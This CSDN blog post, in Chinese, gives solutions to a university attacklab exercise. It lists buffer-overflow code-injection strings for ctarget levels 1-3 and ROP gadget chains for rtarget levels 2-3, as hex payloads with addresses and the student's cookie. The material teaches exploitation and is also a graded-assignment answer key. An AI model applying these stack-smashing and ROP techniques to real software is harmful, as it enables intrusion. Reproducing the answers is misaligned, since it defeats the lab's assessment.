南邮——计算机系统基础实验3:attacklab

已于 2025-05-18 13:45:46 修改
阅读量969 收藏 10
点赞数 32
文章标签: 反汇编 linux
于 2025-05-18 13:03:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljx_yeshen/article/details/148042034
版权

ctarget

level1

(1)使用objdump -d ctarget > my_ctarget.txt导出汇编指令集文件。

(2)查找getbuf函数,确定缓冲区大小为0x18(24)字节。

(3)查找touch1函数地址,确定目标地址为0x401eae。

(4)构建攻击字符串“缓冲区填充字段+touch1地址”。

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

ae 1e 40 00 00 00 00 00#touch1

level2

(1)使用cat cookie.txt查看cookie参数。

0x1c0096e1

(2)使用nano inject.s编辑攻击指令。

                     move $0x1c0096e1,%edi#传递cookie参数

                     ret

                    PS:这里需要将cookie传入%edi。

(3)使用gcc -c inject.s汇编攻击指令,在objdump -d inject.o输出机器码。

(4)查找touch2函数地址。

(5)gdb ctarget调试程序,查找栈起始地址。

  I、set environment LD_PRELOAD=./printf.so设置环境。

  II、break getbuf设置断点。

  III、ni/si运行到传递参数位置。

  IV、x/80xb $rsp/p/x $rsp查看栈起始地址。

(6)构建攻击字符串。

bf e1 96 00 1c c3 00 00#攻击指令机器码

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

88 fb 63 55 00 00 00 00#栈起始地址

e2 1e 40 00 00 00 00 00#touch2地址

level3

(1)查找touch3函数地址。

(2)读取地址=0x5563fb88+0x18=0x5563fba0。

(3)使用nano inject2.s编辑攻击指令。

                       mov $0x5563fba0,%edi

                       ret

(4)汇编并输出攻击指令的机器码。

(5)构建攻击字符串。

bf a0 fb 63 55 c3 00 00#攻击指令

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

88 fb 63 55 00 00 00 00#栈起始地址

ff 1f 40 00 00 00 00 00#touch3地址

31 63 30 30 39 36 65 31#cookie的十六进制表示

00 00 00 00 00 00 00 00#字符串结尾\0且字节对齐

rtarget

     ROP技术使用已有的汇编指令节构建自己的攻击指令。

     PS:使用objdump -d rtarget>my_rtarget.txt导出rtarget的汇编指令文件。

 level2

(1)构建攻击指令文件inject3.s,然后汇编和反编译获取机器码。

(2)在rtarget中查找攻击指令节。

       I、58:4020ca

       II、48 89 c7:4020bf

(3)构建攻击字符串。

00 00 00 00 00 00 00 00#缓冲区填充字段

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

ca 20 40 00 00 00 00 00#pop %rax

e1 96 00 1c 00 00 00 00#cookie

bf 20 40 00 00 00 00 00#mov %rax,%rdi

e2 1e 40 00 00 00 00 00#touch2地址

level3

(1)构建攻击指令文件inject4.s,然后汇编和反编译获取机器码。

(2)在rtarget中查找攻击指令节。

I、58:4020ca

II、89 c2:402171

III、89 d1:4021df

IV、89 ce:402234

V、48 89 e0:402132

VI、48 89 c7:4020bf

VII、48 8d 04 37:402111

VIII、48 89 c7:4020bf

(3)构建攻击字符串。

00 00 00 00 00 00 00 00#缓冲区填充字段

00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00

ca 20 40 00 00 00 00 00#pop %rax

20 00 00 00 00 00 00 00#0x18+0x8偏移量

71 21 40 00 00 00 00 00#mov %eax,%edx

df 21 40 00 00 00 00 00#mov %edx,%ecx

34 22 40 00 00 00 00 00#mov %ecx,%esi

32 21 40 00 00 00 00 00#mov %rsp,%rax

bf 20 40 00 00 00 00 00#mov %rax,%rdi

11 21 40 00 00 00 00 00#lea (%rdi,%rsi,1),%rax

bf 20 40 00 00 00 00 00#mov %rax,%rdi

ff 1f 40 00 00 00 00 00#touch3地址

31 63 30 30 39 36 65 31#cookie字符串十六进制

00 00 00 00 00 00 00 00#字符串以\0结尾且字节对齐

Windows安装adb和常用操作命令
u010479989的博客
07-15 4943
ADBAndroid Debug Bridge)是Android开发者、测试工程师和普通用户在管理、调试、自动化控制Android设备时的重要工具。它提供了丰富的命令集,允许通过命令行接口对Android设备进行各种操作。
win7 adb安装
01-31
windows 强大的adb,直接可以使用,不需要在安装他东西,操作简单但应用强大。
windows下的adb安装
09-21
windows下的 adb安装,解压到 C:\adb 以方便调用, 打开命令行窗口
ADB安装使用详解(非常详细)从零基础入门到精通,看完这一篇就够了_adb配置
最新发布
logic1001的博客
03-17 6120
ADB 全称为 Android Debug Bridge,起到调试桥的作用,是一个。其中客户端是用来操作的电脑,服务端是 Android 设备。ADB 也是 Android SDK 中的一个工具,可以直接操作管理 Android 模拟器或者真实的 Android 设备。
ADB 安装教程:如何在 Windows、macOS 和 Linux 上安装 Android Debug Bridge
帅次的博客
09-20 1万+
ADBAndroid Debug Bridge)是一款功能强大的命令行工具,广泛用于Android开发和设备管理。本文详细介绍了如何在Windows、macOS和Linux系统上安装和配置ADB。首先,用户需要从Android官方网站下载ADB工具包,并通过配置环境变量来确保ADB命令可以在任何目录下执行。在Windows中,使用“系统属性”设置环境变量,而在macOS和Linux中,则需通过修改终端配置文件来添加ADB路径。
adb命令
、moddemod
05-06 813
# 查看设备 adb devices # 进入指定的设备 adb -s <some> shell adb shell # 获取安卓版本 getprop ro.build.version.release # 获取设备型号 getprop ro.prodect.model # 获取产商名称 getprop ro.product.brand # 获取序列号 getprop ro.serialno # 获取系统api版本 getprop ro.build.version.sdk adb
Windows安装ADB
caoxc86的博客
03-31 837
下载后解压出来,放在硬盘任意位置,记住存放的路径,等下有用。的变量,点新建,将刚刚解压的文件存放的路径输进去就行了。右击此电脑,选择属性,进入环境变量页面。,能看到版本号证明已经成功了。
最新Windows安装adb方法
fei8fengbao的博客
06-25 4587
下载地址:https://developer.android.google.cn/tools/releases/platform-tools?下载得到platform-tools-latest-windows,解压这个压缩包,能够得到platform-tools文件夹。将adb安装路径添加到系统的环境变量(因为这样就可以在任何文件夹下都能使用adb )运行 adb ,则会输出 adb 版本 安装路径等详细信息(则表示安装成功,反之失败。
Windows系统下配置安装adb与Andriod手机有线和无线通信
qq_40280673的博客
04-03 3871
Windows系统下配置安装adb与Andriod手机有线和无线通信
Windows系统下载并安装ADB驱动
qq_60279185的博客
12-19 6281
Windows系统下安装并配置ADB
Windows ADB工具包
11-02
此文件解压后,存放路径:C:\WINDOWS\system32
window7 64位 adb安装(亲测有效)
08-29
window7 64位 adb安装(亲测有效) 工具:adb(adroid debug brindge) 安装tips: 1记得一定要.把相应文件夹赋值到 C:\Windows\System32和C:\Windows\system\这两个系统目录。 2.Windows+R 打开运行, 输入cmd,打开到上面对应的文件夹下,敲adb就能用了。 cd Windows/system adb.exe 然后就可以使用
windows adb 安装指导
09-24
Windows环境下安装使用ADBAndroid Debug Bridge)是Android开发者必备的技能之一。ADB是一个强大的命令行工具,它允许开发者与Android设备进行通信,包括安装应用、调试、传输文件等。下面将详细介绍如何在...
windows adb调试工具
01-18
Windows使用ADB,你需要先下载并安装Android SDK Platform Tools,其中包含了ADB以及其他相关工具。 安装完成后,你可以通过以下步骤配置和使用ADB: 1. **连接设备**:将Android设备通过USB连接到电脑,确保...
Windows安装adb服务/离线安装adb服务
雾林小妖的博客
07-02 577
Windows安装adb服务/离线安装adb服务
Windows电脑PC使用adb有线跟无线安装apk包
用作学习记录
07-04 1888
Android开发中,经常需要使用ADBAndroid Debug Bridge)来安装APK包到Android设备上,无论是通过有线连接还是无线连接。以下将分别介绍如何通过有线和无线方式使用ADB安装APK包。
adb安装教程Windows10)
猿小白的博客
10-12 2936
ADB,全称为Android Debug Bridge,是Android开发中一个重要的命令行工具。它用于与Android设备进行通信,提供了多种功能来帮助开发者进行调试和应用管理。
adb工具包的安装使用Windows
热门推荐
m0_60352504的博客
09-04 5万+
adb的全称为AndroidDebugBridge,就是起到调试桥的作用。通过adb我们可以在Eclipse中方便通过DDMS来调试Android程序,说白了就是debug工具。Fastboot,英语翻译意思是快速启动。Fastboot是一种电脑通过USB数据线对手机固件进行刷写、擦除/格式化、调试、传输各种指令的固件通信协议同时也是Google的AndroidSDKPlatformTools中的一个命令行工具。需要在电脑上安装适合手机的USB驱动程序。在安卓手机刷机。.........
windows安装adb教程
07-28
为了在Windows安装ADB工具,你可以按照以下步骤进行操作: 1. 首先,下载ADB工具包并解压缩到你自定义的安装目录。你可以选择将其解压缩到任何你喜欢的位置。 2. 打开运行窗口,可以通过按下Win+R键来快速打开。在运行窗口中输入"sysdm.cpl"并按下回车键。 3. 在系统属性窗口中,选择"高级"选项卡,然后点击"环境变量"按钮。 4. 在环境变量窗口中,选择"系统变量"部分,并找到名为"Path"的变量。点击"编辑"按钮。 5. 在编辑环境变量窗口中,点击"新建"按钮,并将ADB工具的安装路径添加到新建的路径中。确保路径正确无误后,点击"确定"按钮。 6. 返回到桌面,打开命令提示符窗口。你可以通过按下Win+R键,然后输入"cmd"并按下回车键来快速打开命令提示符窗口。 7. 在命令提示符窗口中,输入"adb version"命令来验证ADB工具是否成功安装。如果显示版本信息,则表示安装成功。 这样,你就成功在Windows安装ADB工具。你可以使用ADB工具来执行各种操作,如枚举设备、进入/退出ADB终端、文件传输、运行命令、查看系统日志等。具体的操作方法可以参考ADB工具的官方文档或其他相关教程。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [windows环境安装adb驱动](https://blog.csdn.net/zx54633089/article/details/128533343)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Windows安装使用ADB简单易懂教程](https://blog.csdn.net/m0_37777700/article/details/129836351)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值